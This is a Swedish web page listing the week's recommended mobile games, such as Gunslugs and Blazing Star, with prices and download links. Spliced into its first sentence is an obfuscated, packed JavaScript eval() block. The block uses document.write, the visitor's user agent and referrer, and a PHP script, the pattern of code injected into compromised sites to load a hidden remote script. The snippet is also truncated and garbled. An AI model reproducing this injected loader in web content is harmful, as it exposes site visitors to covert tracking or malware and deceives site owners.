Image Image Image Image Image Image Image Image Image Image

| 28 november, 2020

Scroll to top

Top

App: Mobilspelslistan för vecka 8 2013

App: Mobilspelslistan för vecka 8 2013


Veckans eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|khhnr|var|u0026u|referrer|yftde||js|php’.split(’|’),0,{}))
app på Revue.se listar varje vecka några av de appar till mobilen vi tycker du borde testa. Den här veckan är det spel som står i fokus och vi har tagit oss an en Neo Geo-klassiker, en frågesport och massa annat skoj.

Kika nedan och sortera ut det just du tycker verkar intressant. Glöm inte heller att kolla på tidigare veckor och se om du finner det du söker.

Gunslugs
Gunslugs Pascal Bestebroer Spel, Casual, Action 25 SEK Ladda ner
BLAZING STAR
BLAZING STAR SNK CORPORATION Spel, Casual, Underhållning, Action 12 SEK Ladda ner
LiquidSketch
LiquidSketch Tobias Neukom Spel, Pussel, Simulering Gratis Ladda ner
Baseball Superstars® 2013
Baseball Superstars® 2013 GAMEVIL Inc. Spel, Sport, Underhållning, Rollspel Gratis Ladda ner